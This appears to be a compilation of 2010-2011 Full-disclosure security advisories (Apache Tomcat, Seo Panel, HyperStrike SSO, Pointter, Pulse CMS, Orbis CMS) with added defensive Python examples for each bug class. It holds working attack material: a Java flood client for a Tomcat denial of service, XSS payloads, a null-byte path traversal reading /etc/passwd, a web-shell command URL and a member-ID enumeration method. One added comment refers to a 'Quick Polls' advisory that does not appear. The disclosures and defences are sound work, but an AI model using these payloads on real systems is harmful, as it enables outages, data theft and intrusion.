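#   language-range = ( ( 1*8ALPHA *( "-" 1*8ALPHA ) ) | "*" )
#   qvalue         = ( "0" [ "." 0*3DIGIT ] ) | ( "1" [ "." 0*3("0") ] )
# Implied linear white space is tolerated around ';' and '='.
_LANGUAGE_RANGE = r"(?:\*|[A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*)"
_QVALUE = r"(?:0(?:\.[0-9]{0,3})?|1(?:\.0{0,3})?)"
_ELEMENT = re.compile(
    r"\A" + _LANGUAGE_RANGE + r"(?:[ \t]*;[ \t]*q[ \t]*=[ \t]*" + _QVALUE + r")?\Z"
)


def accept_language_is_compliant(value):
    """True only if every element of the header value matches RFC 2616.

    A qvalue such as 2.2250738585072012e-308 has an exponent and an integer
    part other than 0 or 1; the grammar admits neither, so the string is
    rejected before any floating-point parser sees it.
    """
    elements = [e.strip(" \t") for e in value.split(",")]
    elements = [e for e in elements if e]  # the #rule tolerates empty elements
    if not elements:
        return False
    return all(_ELEMENT.match(e) is not None for e in elements)


def screen_request(headers):
    """Filter decision for one request's (name, value) header list.

    Returns None to let the request through, or (status, reason) to reject it.
    Every occurrence of the header is checked, since a client may repeat it.
    """
    for name, value in headers:
        if name.lower() == "accept-language" and not accept_language_is_compliant(value):
            return 400, "malformed Accept-Language"
    return None


# Constructed sample requests (not captured traffic).
BENIGN = [("Host", "example.com"), ("Accept-Language", "da, en-gb;q=0.8, en;q=0.7")]
HOSTILE = [("Host", "example.com"), ("Accept-Language", "en-us;q=2.2250738585072012e-308")]

if __name__ == "__main__":
    print("benign:", screen_request(BENIGN))
    print("hostile:", screen_request(HOSTILE))
```

Rejecting on the grammar rather than on a blocklist of known bad numbers also covers the neighbouring values that trigger the same JVM bug, and anything else a future parser might choke on that the grammar never allowed.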


[Full-disclosure] [SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability

2011-02-04 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2011-0534 Apache Tomcat DoS vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.6
- Tomcat 6.0.0 to 6.0.30

Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the
request line in the NIO HTTP connector. A specially crafted request
could trigger a DoS via an OutOfMemoryError.

Example (AL2 licensed):
package bug50631;

import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;

public class FloodClient1 {
    static final int k_step = 10;
    // 10 KiB buffer, filled below with CR (13) bytes: never an LF, so the
    // server never sees the end of the request line.
    static byte[] value = new byte[k_step * 1024];

    public static void main(String[] args) throws Exception {
        int i = 0;
        while (i < value.length) {
            value[i++] = 13;
        }
        SocketAddress addr = new InetSocketAddress("localhost", 8080);
        Socket socket = new Socket();
        socket.setSoTimeout(0);
        socket.connect(addr, 0);
        OutputStream os = socket.getOutputStream();
        // InputStream is = socket.getInputStream();

        // k counts KiB sent in the current MiB, m counts MiB sent; stream
        // about 2000 MiB of request-line bytes with no terminator.
        int k = k_step;
        int m = 0;
        int k100 = 100;
        while (m < 2000) {
            if (k >= k100) {
                k100 += 100;
                System.out.print('.');
                System.out.flush();
            }
            if (k >= 1024) {
                m++;
                k -= 1024;
                k100 = 100;
                System.out.println(" " + m + " Mb");
            }
            os.write(value);
            os.flush();
            Thread.sleep(1);
            k += k_step;
        }
    }
}

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to a Tomcat version where this issue is fixed
- Use a BIO or AJP HTTP connector in place of an NIO HTTP connector

Credit:
The issue was identified by the Tomcat security team.

References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html

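
FloodClient1 never sends a line feed, so a request-line reader that buffers until it sees one will grow without bound; the advisory's point is that maxHttpHeaderSize has to apply to the request line as well as to the headers. The following added example (not Tomcat code) puts the two readers side by side on a constructed flood of bare CR bytes: the bounded one fails after max_bytes + 1 bytes, the unbounded one swallows the whole stream. The 8192-byte default is Tomcat's documented default for maxHttpHeaderSize; the byte-at-a-time loop is only there to make the defect visible.

```python
import io

# Tomcat's documented default for maxHttpHeaderSize; the advisory's point is
# that the request line has to count against such a bound as well.
MAX_HTTP_HEADER_SIZE = 8192


class RequestLineTooLong(Exception):
    pass


def read_request_line_unbounded(stream):
    """The defect class: keep buffering until LF, however much arrives.

    A client that never sends LF (FloodClient1 above sends only CR bytes)
    makes this buffer grow until the process runs out of memory.
    """
    buf = bytearray()
    while True:
        b = stream.read(1)
        if not b:
            raise ConnectionError("connection closed before end of request line")
        buf += b
        if b == b"\n":
            return bytes(buf).rstrip(b"\r\n")


def read_request_line_bounded(stream, max_bytes=MAX_HTTP_HEADER_SIZE):
    """Read at most max_bytes + 1 bytes and fail fast if no LF arrived in time."""
    line = stream.readline(max_bytes + 1)
    if not line.endswith(b"\n"):
        if len(line) > max_bytes:
            raise RequestLineTooLong(f"request line exceeds {max_bytes} bytes")
        raise ConnectionError("connection closed before end of request line")
    return line.rstrip(b"\r\n")


def parse_request_line(line):
    """Split b'METHOD target HTTP/x.y' into its three parts (minimal check)."""
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        raise ValueError(f"malformed request line: {line!r}")
    return tuple(p.decode("ascii") for p in parts)


# Constructed inputs: one ordinary request, and 256 KiB of bare CR bytes with
# no LF anywhere, which is what FloodClient1 streams.
NORMAL = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"
FLOOD = b"\r" * (256 * 1024)


def demo():
    """Returns what each reader does with the normal request and the flood."""
    ok = parse_request_line(read_request_line_bounded(io.BytesIO(NORMAL)))

    bounded = io.BytesIO(FLOOD)
    try:
        read_request_line_bounded(bounded)
        bounded_result = "accepted"
    except RequestLineTooLong:
        bounded_result = f"rejected after {bounded.tell()} bytes"

    unbounded = io.BytesIO(FLOOD)
    try:
        read_request_line_unbounded(unbounded)
        unbounded_result = "accepted"
    except ConnectionError:
        unbounded_result = f"buffered all {unbounded.tell()} bytes before giving up"

    return ok, bounded_result, unbounded_result


if __name__ == "__main__":
    for result in demo():
        print(result)
```

In a real server the bounded reader would answer with 414 or 400 and close the connection; the memory cost per hostile client is then fixed at the bound, which is the property the missing check removed.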


[Full-disclosure] [SECURITY] CVE-2011-0013 Apache Tomcat Manager XSS vulnerability

2011-02-04 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2011-0013 Apache Tomcat Manager XSS vulnerability

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.5
- Tomcat 6.0.0 to 6.0.29
- Tomcat 5.5.0 to 5.5.31
- Earlier, unsupported versions may also be affected

Description:
The HTML Manager interface displayed web application provided data, such
as display names, without filtering. A malicious web application could
trigger script execution by an administrative user when viewing the
manager pages.

Example:
<display-name>&lt;script&gt;alert('hi');&lt;/script&gt;</display-name>

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Undeploy untrusted web applications
- Remove the Manager application

Credit:
The issue was identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html



[Full-disclosure] 'Seo Panel' Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331)

2011-01-15 Thread Mark Stanislav
'Seo Panel' Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in 'Seo Panel' page rendering which allows for 
unfiltered, unencrypted content to be presented to a user through two different 
cookies.

 
II. TESTED VERSION
---
2.2.0


III. PoC EXPLOIT
---
Alter the value of cookies called 'default_news' or 'sponsors' and then view a 
site page which includes controllers/index.ctrl.php or 
controllers/settings.ctrl.php that will render the cookies as they exist on the 
user's machine.


IV. NOTES 
---
* The 'default_news' cookie doesn't require a user to be authenticated whereas 
'sponsors' does
* The disclosure date was pushed a full month so that a fix could be released 
but no update was released yet
* Based on discussions with the developer, they will likely encrypt the cookie 
contents to prevent this issue


V. SOLUTION
---
Upgrade to a release > 2.2.0 when available or otherwise disable cookie 
rendering.


VI. REFERENCES
---
http://www.seopanel.in/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4331
http://www.uncompiled.com/2011/01/seo-panel-cookie-rendered-persistent-xss-vulnerability-cve-2010-4331/


VII. TIMELINE
---
11/24/2010 - Initial vendor disclosure
11/25/2010 - Vendor response and commitment to fix
11/25/2010 - Reply to vendor detailing potential fixes and an adjusted public 
disclosure date
11/25/2010 - Vendor response confirming desired public disclosure date and 
agreement to patch method
01/15/2011 - Public disclosure


[Full-disclosure] HyperStrike Integration with Snap Fitness, SSO Bypass Vulnerability

2010-12-21 Thread Mark Stanislav
HyperStrike Integration with Snap Fitness, SSO Bypass Vulnerability
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability existed within the single sign-on (SSO) integration of 
HyperStrike and Snap Fitness websites. By altering the defined 'memberid' 
parameter passed within the site-integration query string, varied amounts of 
member data could be retrieved depending on the account activation status and 
HyperStrike usage of a given Snap Fitness member.


II. ACCOUNTS AFFECTED
---
90,000+


III. VULNERABILITY VERIFICATION PROCESS
---
* Script #1: Starting at an arbitrary number, I looped through 10,000 
sequential 'memberid' values for Snap Fitness (gymid '21'). Roughly 2,700 
accounts existed in either an 'activated' or 'unactivated' state.

* Script #2: Starting at a different arbitrary number, I looped through 1,000 
sequential 'memberid' values for Snap Fitness. The specific purpose of this 
loop was to look for only activated accounts. Of the 1,000 'memberid' values 
checked, 76 accounts were activated. Based on simple regular expression checks, 
I verified that one user's profile had a picture, eight users had listed phone 
numbers, and at least one user had a medical questionnaire filled-out. This is 
all in addition to standard PII available.


IV. POTENTIAL ACCOUNT DATA AT RISK
---
* Activated Account:  Photo, First Name, Last Name, Date of Birth, Gender, 
E-Mail Address, Phone Number, Height, Weight, Body Fat %, Timezone, Gym 
Membership Company, Workout Schedule, and Medical History (blood pressure 
issues, heart problems, recent surgery, pregnancy, diabetes, etc.)

* Unactivated Account: First Name, Last Name, Date of Birth, Gender, and E-Mail 
Address


V. VULNERABLE URL FORMAT
---
http://www.hyperstrike.com/diff/partners/snap/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]


VI. NOTES 
---
* Because Snap Fitness apparently provides HyperStrike with customer data 
before a customer agrees to sign-up with HyperStrike, customers of Snap Fitness 
had their personal details (as explained above for 'Unactivated Account') 
available to be taken without ever agreeing to use HyperStrike services or even 
know about the company.

* All account data collected during the vulnerability verification process was 
erased and at no time was any Snap Fitness/HyperStrike customer's data given to 
any individual.

* There is no known and/or reported breach of customer information. Ideally I 
was the first and only person to find this issue before it was a threat to 
customer privacy.

* No previous session, cookie, authentication, authorization, or otherwise was 
required to retrieve private member data. No 'spoofing' or 'hacking' occurred 
whatsoever.

* As an aside, the language towards me from Michael Greeves (and CC: inclusion 
of legal staff) became accusatory rather than appreciative after a few e-mails. 
The notification letter shown below that was presented to members treats the 
situation seemingly as a breach by some nefarious person rather than a 
disclosure by a responsible IT professional. Needless to say, not everyone 
knows how to say 'thanks for preventing a huge lawsuit' very well it would seem 
;)


VII. REMEDIATION
---
The previously implemented single sign-on wasn't configured properly for the 
integration between Snap Fitness and HyperStrike. After notice was given by 
HyperStrike that the issue was remediated, I verified that the previous SSO 
bypass was no longer functional.


VIII. REFERENCES
---
http://www.hyperstrike.com/
http://www.snapfitness.com/
http://www.uncompiled.com/2010/12/hyperstrike-integration-with-snap-fitness-sso-bypass-vulnerability/


IX. TIMELINE
---
08/29/2010 - Vulnerability found and verified
08/29/2010 - E-mail to HyperStrike disclosing the vulnerability and asking for 
a response to start the remediation process
09/07/2010 - Follow-up call to HyperStrike after not receiving a response in 
the prior days
09/07/2010 - Call from Michael Greeves, CEO of HyperStrike to discuss the 
vulnerability; promised 24-hour follow-up regarding remediation
09/07/2010 - Resent original disclosure e-mail + complete vulnerability report 
to Michael
09/17/2010 - Follow-up e-mail to Michael with regard to the remediation status 
of the vulnerability
09/17/2010 - Response from Michael stating a call was to be occurring with Snap 
Fitness that day about the issue
09/21/2010 - Response from Michael stating that they are working to remedy the 
issue and asking me to delete all customer data
09/22/2010 - E-mail sent to Michael reassuring him that as my report nearly a 
month prior stated, no customer data was kept
09/23
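
The handoff above trusts two integers in the query string, so anyone can walk the memberid space. The usual design for a partner single sign-on is that the site that authenticated the member issues a short-lived, HMAC-signed token naming the member, and the receiving site accepts only what that token says. The following is an added example of that design in Python, not HyperStrike's or Snap Fitness's code: the shared secret, the token layout (payload, then the HMAC-SHA256 of it), the five-minute lifetime and the member records are all constructed for the example. It shows the original URL shape returning a record for any memberid, the signed variant refusing a bare memberid, and a token whose memberid was rewritten failing the MAC check.

```python
import base64
import hashlib
import hmac
import time
from urllib.parse import parse_qs

# Hypothetical secret shared by the two partner sites (assumption for the example).
SHARED_SECRET = b"constructed-example-secret-not-for-production"

# Constructed member records standing in for the receiving site's database.
MEMBERS = {
    12345: {"first": "Alice", "last": "Example", "email": "alice@example.com"},
    12346: {"first": "Bob", "last": "Example", "email": "bob@example.com"},
}


def make_sso_token(memberid, gymid, now=None, ttl=300, secret=SHARED_SECRET):
    """Minted by the site that actually authenticated the member."""
    exp = int((time.time() if now is None else now) + ttl)
    payload = f"{memberid}:{gymid}:{exp}".encode()
    mac = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + mac


def verify_sso_token(token, now=None, secret=SHARED_SECRET):
    """Return (memberid, gymid) if the MAC matches and the token is unexpired, else None."""
    try:
        payload_b64, mac = token.split(".")
        payload = base64.urlsafe_b64decode(payload_b64.encode())
        expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, mac):
            return None
        memberid, gymid, exp = payload.decode().split(":")
        if int(exp) < (time.time() if now is None else now):
            return None
        return int(memberid), int(gymid)
    except ValueError:  # bad base64, wrong field count, non-numeric fields
        return None


def activate_vulnerable(query):
    """The advisory's URL shape: memberid and gymid are trusted as supplied."""
    q = parse_qs(query)
    return MEMBERS.get(int(q["memberid"][0]))


def activate_fixed(query, now=None):
    """Only a token minted by the issuing side selects a member; the client
    cannot name the memberid directly, so sequential guessing returns nothing."""
    q = parse_qs(query)
    claims = verify_sso_token(q.get("token", [""])[0], now=now)
    if claims is None:
        return None
    memberid, _gymid = claims
    return MEMBERS.get(memberid)


def forge_token(token, new_memberid):
    """What an enumerating client can try: rewrite the memberid, keep the MAC."""
    payload_b64, mac = token.split(".")
    _old, gymid, exp = base64.urlsafe_b64decode(payload_b64.encode()).decode().split(":")
    payload = f"{new_memberid}:{gymid}:{exp}".encode()
    return base64.urlsafe_b64encode(payload).decode() + "." + mac


if __name__ == "__main__":
    tok = make_sso_token(12345, 21)
    print("bare id, vulnerable:", activate_vulnerable("memberid=12346&gymid=21"))
    print("bare id, fixed:     ", activate_fixed("memberid=12346&gymid=21"))
    print("valid token:        ", activate_fixed("token=" + tok))
    print("forged token:       ", activate_fixed("token=" + forge_token(tok, 12346)))
```

The expiry keeps a captured token from being replayed indefinitely, and compare_digest keeps the MAC comparison from leaking timing; neither helps if the secret is shared with the client, so it lives only on the two servers.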

Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-18 Thread mark seiden
i was joking about the history of the s boxes, originally designed by ibm but
with substantial classified input from nsa.

suspicious people believed the s box changes (and the reduced key length) that
was adopted was intended to weaken des, or make it more brute-forceable by the 
nsa.

the designers deny it.  

the parallels between that situation and this should be evident.

On Dec 16, 2010, at 4:26 AM, Abuse007 wrote:
 
 Changing the s-boxes in DES (and therefore Triple DES as well) would break 
 comparability with other implementations as it would no longer decrypt the 
 same as a standard implementation.

for more you can see, among others

http://www.wordiq.com/definition/DES#NSA.27s_involvement_in_the_design


[Full-disclosure] 'Pointter PHP Content Management System' Unauthorized Privilege Escalation (CVE-2010-4332)

2010-12-15 Thread Mark Stanislav
'Pointter PHP Content Management System' Unauthorized Privilege Escalation 
(CVE-2010-4332)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the 'Pointter PHP Content Management System' 
authentication system which allows for administrative privileges by crafting 
two specific cookies with arbitrary values.

 
II. TESTED VERSION
---
1.0


III. PoC EXPLOIT
---
Using whatever method you prefer, generate 'auser' and 'apass' cookies. The 
values of each cookie are irrelevant; the mere presence of the cookies provide 
the administrative privilege.


IV. NOTES 
---
* Here's a snippet of the final reply that I received from the vendor:
Of course, it could be made safer and we know how to do it. But we have 
designed the softwares so that renaming admin folder gives us less work. As you 
know, the users should know the security issues as they will run this and not 
us.


V. SOLUTION
---
* There is no update released at this time. Avoidance of this software is 
recommended until an updated version is available.


VI. REFERENCES
---
http://www.pointter.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4332
http://www.uncompiled.com/2010/12/pointter-php-content-management-system-unauthorized-privilege-escalation-cve-2010-4332/


VII. TIMELINE
---
11/23/2010 - Initial vendor disclosure e-mail sent
11/24/2010 - Reply from vendor informing me that my 'software manipulation' was 
illegal
11/24/2010 - Response to vendor regarding their accusation of illegal actions 
on my part
11/24/2010 - Reply from vendor stating that by releasing this information, I am 
committing a crime
11/24/2010 - Response to vendor that their software is CC-licensed and that 
their accusations are unfounded
11/24/2010 - Rebuttal from vendor again affirming I was breaking the law by 
disclosing this vulnerability
11/24/2010 - Reply to vendor again stating my intent to help the company and 
provide responsible disclosure
11/24/2010 - Response from vendor stating they would no longer respond and 
explained their stance on fixing this issue
11/24/2010 - Final reply to vendor stating that I was happy to work with them 
on a delayed disclosure if desired
12/15/2010 - Public disclosure


[Full-disclosure] 'Pointter PHP Micro-Blogging Social Network' Unauthorized Privilege Escalation (CVE-2010-4333)

2010-12-15 Thread Mark Stanislav
'Pointter PHP Micro-Blogging Social Network' Unauthorized Privilege Escalation 
(CVE-2010-4333)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the 'Pointter PHP Micro-Blogging Social Network' 
authentication system which allows for administrative privileges by crafting 
two specific cookies with arbitrary values.

 
II. TESTED VERSION
---
1.8


III. PoC EXPLOIT
---
Using whatever method you prefer, generate 'auser' and 'apass' cookies. The 
values of each cookie are irrelevant; the mere presence of the cookies provide 
the administrative privilege.


IV. NOTES 
---
* Here's a snippet of the final reply that I received from the vendor:
Of course, it could be made safer and we know how to do it. But we have 
designed the softwares so that renaming admin folder gives us less work. As you 
know, the users should know the security issues as they will run this and not 
us.


V. SOLUTION
---
* There is no update released at this time. Avoidance of this software is 
recommended until an updated version is available.


VI. REFERENCES
---
http://www.pointter.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4333
http://www.uncompiled.com/2010/12/pointter-php-micro-blogging-social-network-unauthorized-privilege-escalation-cve-2010-4333/

VII. TIMELINE
---
11/23/2010 - Initial vendor disclosure e-mail sent
11/24/2010 - Reply from vendor informing me that my 'software manipulation' was 
illegal
11/24/2010 - Response to vendor regarding their accusation of illegal actions 
on my part
11/24/2010 - Reply from vendor stating that by releasing this information, I am 
committing a crime
11/24/2010 - Response to vendor that their software is CC-licensed and that 
their accusations are unfounded
11/24/2010 - Rebuttal from vendor again affirming I was breaking the law by 
disclosing this vulnerability
11/24/2010 - Reply to vendor again stating my intent to help the company and 
provide responsible disclosure
11/24/2010 - Response from vendor stating they would no longer respond and 
explained their stance on fixing this issue
11/24/2010 - Final reply to vendor stating that I was happy to work with them 
on a delayed disclosure if desired
12/15/2010 - Public disclosure


Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-15 Thread mark seiden

On Dec 15, 2010, at 5:23 PM, Graham Gower wrote:

 On 16 December 2010 09:50, Larry Seltzer la...@larryseltzer.com wrote:
 Has anyone read this yet?
 
 http://www.downspout.org/?q=node/3
 
 Seems IPSEC might have a back door written into it by the FBI?
 
 Surely the thing to do now is not to audit *your own* OpenBSD code, but to
 audit the OpenBSD code from about 8 years ago. If there's nothing there,
 then the claim is BS.
 
 LJS
 
 
 Or get hold of the old version of OpenBSD used at EOUSA and compare it
 to the OpenBSD code from the same time.
 

why should anyone other than a us attorney or perhaps an asst us attorney give 
a rat's ass
what may have been going on in their govt issue vpn some years ago?

but, as they prosecute federal crimes, if anyone committed a federal crime 
within
their office due to this they are certainly equipped to go after them.

these guys have nothing to do with the fbi (they are familially one of the 
fbi's little
first cousins within justice dept) and also have nothing to do with the openbsd 
distribution.

justice and fbi and darpa barely talk with each other about technology is my 
very
strong impression.

this whole story makes very little sense to anyone who was at all acquainted 
with this
scene at the time.

unless you control the compiler (see ken thompson's turing award lecture) it's 
a 
fanciful idea that you could successfully plant a backdoor in an open source OS 
and 
expect it to survive.  why even bother?

(now, watering down the s boxes in single des, that might be feasible...)






[Full-disclosure] 'Pulse CMS Basic' Local File Inclusion Vulnerability (CVE-2010-4330)

2010-12-05 Thread Mark Stanislav
'Pulse CMS Basic' Local File Inclusion Vulnerability (CVE-2010-4330)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the 'includes/controller.php' script that allows for 
arbitrary local file inclusion due to a null-byte attack.

 
II. TESTED VERSION
---
Version 1.2.8


III. AFFECTED VERSIONS
---
< 1.2.9


IV. PoC EXPLOIT
---
http://www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00


V. NOTES 
---
* magic_quotes_gpc must be disabled for null-byte attacks to work
* This issue did not affect Pulse CMS Pro according to the vendor


VI. SOLUTION
---
Upgrade all previously installed versions to 1.2.9


VII. REFERENCES
---
http://pulsecms.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4330
http://www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/


VIII. TIMELINE
---
11/24/2010: Initial vendor disclosure
11/25/2010: Vendor response that they had fixed the issue & updated the 
existing version (1.2.8)
11/25/2010: Replied to vendor inquiring if a new point release would be made 
and affected versions
11/26/2010: Vendor response noting a version increment was coming & vulnerable 
versions confirmation
11/26/2010: Pulse CMS Basic 1.2.9 released
12/05/2010: Public disclosure
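
Both this Pulse CMS advisory (CVE-2010-4330) and the Quick Polls one above (CVE-2011-1099) are the same bug class: a request parameter is joined to a base directory, a fixed extension is appended, and the result goes to a file function whose C implementation stops at the first NUL byte, so "%00" drops the extension and "../" walks out of the directory. The following added example (Python, not the PHP of either product) emulates that resolution, shows why the advisories' magic_quotes_gpc note holds (the NUL is escaped and no longer terminates the path), and gives the hardened form: reject NUL, allow-list the name, then confirm the realpath stays under the base directory. The base directory is a constructed value. Separately, PHP 5.3.4 and later reject paths containing NUL in the filesystem functions themselves.

```python
import os
import re
import tempfile


class UnsafePath(Exception):
    pass


def resolve_include_vulnerable(base_dir, p, ext=".php"):
    """The pattern behind both advisories: join the parameter to a base
    directory, append a fixed extension, and pass the result to a C-backed
    file function that stops at the first NUL (emulated here), so the
    appended extension falls away. normpath shows what the OS would open."""
    path = os.path.join(base_dir, p + ext)
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]
    return os.path.normpath(path)


def addslashes(p):
    """What magic_quotes_gpc did to the parameter: NUL becomes a backslash
    followed by '0', so it no longer terminates a C string and the
    extension survives. A mitigation by accident, not a fix."""
    return (p.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


_NAME = re.compile(r"\A[A-Za-z0-9_-]{1,64}\Z")


def resolve_include_safe(base_dir, p, ext=".php"):
    """Allow-list the name, then confirm the resolved path is inside base_dir."""
    if "\x00" in p:
        raise UnsafePath("NUL byte in parameter")
    if not _NAME.match(p):
        raise UnsafePath("parameter is not a plain name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, p + ext))
    # Belt and braces: realpath follows symlinks, so a link planted inside
    # base_dir cannot point the include back outside it.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("resolved outside base directory")
    return candidate


def is_rejected(base_dir, p):
    try:
        resolve_include_safe(base_dir, p)
    except UnsafePath:
        return True
    return False


# Constructed inputs: a made-up base directory and the traversal from the PoCs.
BASE = "/var/www/quickpolls/pages"
TRAVERSAL = "../../../../../../../etc/passwd\x00"

if __name__ == "__main__":
    print("vulnerable, quotes off:", resolve_include_vulnerable(BASE, TRAVERSAL))
    print("vulnerable, quotes on: ", resolve_include_vulnerable(BASE, addslashes(TRAVERSAL)))
    print("safe rejects traversal:", is_rejected(BASE, TRAVERSAL))
    with tempfile.TemporaryDirectory() as tmp:
        print("safe accepts 'preview':", resolve_include_safe(tmp, "preview"))
```

The allow-list does the real work; the realpath containment check is there for the case where a legitimate name resolves through a symlink, which the regex alone cannot see.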


[Full-disclosure] 'Orbis CMS' Arbitrary Script Execution Vulnerability (CVE-2010-4313)

2010-11-29 Thread Mark Stanislav
'Orbis CMS' Arbitrary Script Execution Vulnerability (CVE-2010-4313)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the 'Orbis CMS' fileman_file_upload.php script that 
allows any authenticated user to upload a PHP script and then run it without 
restriction.

 
II. TESTED VERSION
---
1.0.2 


III. PoC EXPLOIT
---
1) Login as any CMS user (administrator or non-administrator)
2) Upload your desired PHP script (e.g. cmd.php)
3) Navigate to 
http://www.example.com/orbis/uploads/cmd.php?cmd=cat%20/etc/passwd


IV. NOTES 
---
* This software is no longer developed according to the product page; it is 
still available for download though.
* Various other vulnerabilities exist in this code base (at least for previous 
versions); it's advisable not to use this software as patches are not coming.
* A vendor notice was not done for the aforementioned reasons.


V. SOLUTION
---
Overhaul the upload verification portion of fileman_file_upload.php completely.


VI. REFERENCES
---
http://www.novo-ws.com/orbis-cms/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4313
http://www.uncompiled.com/2010/11/orbis-cms-arbitrary-script-execution-vulnerability-cve-2010-4313/


VII. TIMELINE
---
11/30/2010: Public disclosure
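As an added illustration of what the overhaul asked for in section V has to cover (example code written for this page, not Orbis CMS' own fileman_file_upload.php, and in Python rather than PHP so it runs stand-alone): the client-supplied name only selects an allow-listed extension, the bytes must carry that type's signature, and the stored name is chosen by the server. The extension table and signatures are constructed for the example.

```python
import os
import secrets

# Allow-listed extensions and the file signatures each must start with
# (constructed for this example; Orbis CMS' real handler is not reproduced).
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


def check_upload(client_name: str, content: bytes):
    """Validate one upload.

    Returns (True, storage_name) when the file is acceptable, otherwise
    (False, reason). The storage name is random: the client never chooses
    the path or the name the file is saved under.
    """
    # Drop any directory component the client sent ("../../x.php", "C:\\x").
    base = os.path.basename(client_name.replace("\\", "/"))
    if not base or base.startswith("."):
        return False, "empty name or dot-file (e.g. .htaccess) refused"

    # Exactly one extension. "cmd.php.jpg" is refused outright because
    # some web servers pick a handler from any extension in the name.
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be <stem>.<ext> with a single extension"
    ext = parts[1].lower()

    signatures = ALLOWED_TYPES.get(ext)
    if signatures is None:
        return False, f"extension {ext!r} is not on the allow-list"

    # The extension is a claim, not a fact: the bytes must match the type.
    if not any(content.startswith(sig) for sig in signatures):
        return False, f"content does not carry a {ext!r} signature"

    # Defence in depth against image/PHP polyglots: a file that claims to be
    # an image or a PDF has no business containing a PHP open tag.
    if b"<?php" in content or b"<?=" in content:
        return False, "PHP open tag inside a non-script upload"

    # Server-chosen name. The upload directory itself should sit outside the
    # document root (or have script execution disabled) so that even a
    # mistake here cannot be reached as a URL and executed.
    return True, f"{secrets.token_hex(16)}.{ext}"


def is_accepted(client_name: str, content: bytes) -> bool:
    """Convenience wrapper: True when check_upload would store the file."""
    return check_upload(client_name, content)[0]
```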


[Full-disclosure] [SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability

2010-11-22 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability

Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- - Tomcat 7.0.0 to 7.0.4
  - Not affected in default configuration.
  - Affected if CSRF protection is disabled
  - Additional XSS issues if web applications are untrusted
- - Tomcat 6.0.12 to 6.0.29
  - Affected in default configuration
  - Additional XSS issues if web applications are untrusted
- - Tomcat 5.5.x
  - Not affected

Description:
The session list screen (provided by sessionList.jsp) in affected versions uses 
the orderBy and sort request parameters without applying filtering and 
therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session cookies 
by default so this vulnerability could expose session cookies from the manager 
application to an attacker.
A review of the Manager application by the Apache Tomcat security team 
identified additional XSS vulnerabilities if the web applications deployed were 
not trusted.

Example:
GET 
/manager/html/sessions?path=/sort=scriptalert('xss')/scriptorder=ASCaction=injectSessionsrefresh=Refresh+Sessions+list

Mitigation:
Users of affected versions should apply one of the following mitigations
- - Tomcat 7.0.0 to 7.0.4
  - Remove the Manager application
  - Remove the sessionList.jsp and sessionDetail.jsp files
  - Ensure the CSRF protection is enabled
  - Apply the patch for 7.0.4 (see below)
  - Update to 7.0.5 when released
- - Tomcat 6.0.12 to 6.0.29
  - Remove the Manager application
  - Remove the sessionList.jsp and sessionDetail.jsp files
  - Apply the patch for 6.0.29 (see below)
  - Update to 6.0.30 when released

